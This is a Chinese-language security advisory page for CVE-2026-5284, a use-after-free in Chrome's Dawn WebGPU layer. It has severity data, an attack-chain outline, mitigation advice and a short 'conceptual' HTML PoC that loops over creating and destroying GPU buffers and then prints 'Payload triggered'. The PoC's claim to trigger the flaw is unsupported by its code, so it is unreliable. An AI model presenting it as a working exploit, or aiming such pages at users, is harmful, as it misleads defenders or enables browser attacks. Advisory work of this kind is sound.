CVE-2026-5284 CVSS 7.5 高危

CVE-2026-5284 Google Chrome Dawn释放后重用漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5284

漏洞类型

释放后重用 (UAF)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2026-5284 是 Google Chrome 浏览器中 Dawn 组件的一个高危安全漏洞。该漏洞源于组件中存在释放后重用（Use-After-Free）缺陷。攻击者在已攻陷渲染进程的前提下，通过诱导用户访问特制的 HTML 页面，即可触发该漏洞。成功利用可能导致执行任意代码，进而威胁系统安全。

技术细节

该漏洞位于 Google Chrome 的 Dawn 组件中，Dawn 是 Chrome 用于跨平台实现 WebGPU 的中间层。漏洞原理在于对内存对象的生命周期管理不当，导致对象被释放后仍被引用。攻击者需先获得渲染进程的控制权（通常通过组合利用其他漏洞）。随后，通过精心构造的 HTML 页面调用特定的 WebGPU API 序列，触发 Dawn 中的逻辑错误，使关键图形资源对象被过早释放。攻击者随后可以利用堆喷射等技术控制该释放内存块的数据，从而劫持程序执行流。由于 Chromium 架构的沙箱隔离机制，此漏洞常被用作渲染进程逃逸或提升权限的一环，最终实现远程代码执行。

攻击链分析

STEP 1

1. 初始访问

攻击者诱导受害者访问包含恶意代码的网页。

STEP 2

2. 渲染进程攻陷

攻击者利用其他漏洞或社会工程学手段获得浏览器渲染进程的执行权限。

STEP 3

3. 触发UAF漏洞

恶意网页通过特定的 WebGPU API 调用序列，触发 Dawn 组件中的释放后重用漏洞。

STEP 4

4. 代码执行

利用被释放的内存区域写入恶意 Shellcode，实现任意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-5284 (Conceptual)
Target: Google Chrome < 146.0.7680.178
Component: Dawn (WebGPU)
-->
<html>
<body>
<script type="module">
// Check if WebGPU is available
if (!navigator.gpu) {
    alert("WebGPU not supported");
} else {
    const adapter = await navigator.gpu.requestAdapter();
    const device = await adapter.requestDevice();

    // Attempt to trigger UAF in Dawn by creating and destroying buffers rapidly
    // in a specific sequence that exploits the race condition.
    for (let i = 0; i < 1000; i++) {
        const buffer = device.createBuffer({
            size: 1024,
            usage: GPUBufferUsage.MAP_READ | GPUBufferUsage.COPY_DST,
        });
        
        // Explicitly destroy to trigger internal cleanup logic
        buffer.destroy();
        
        // The vulnerability lies in the timing between destroy and potential lingering references
        // in the command encoder or other internal Dawn structures.
    }
    
    console.log("Payload triggered");
}
</script>
</body>
</html>

影响范围

Google Chrome < 146.0.7680.178

防御指南

临时缓解措施

建议用户立即检查并更新 Google Chrome 浏览器到最新安全版本。在无法立即更新的情况下，应尽量避免点击不明链接或访问非受信网站，以降低被利用的风险。企业用户应加强网络边界防护，防止恶意网页的传播。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表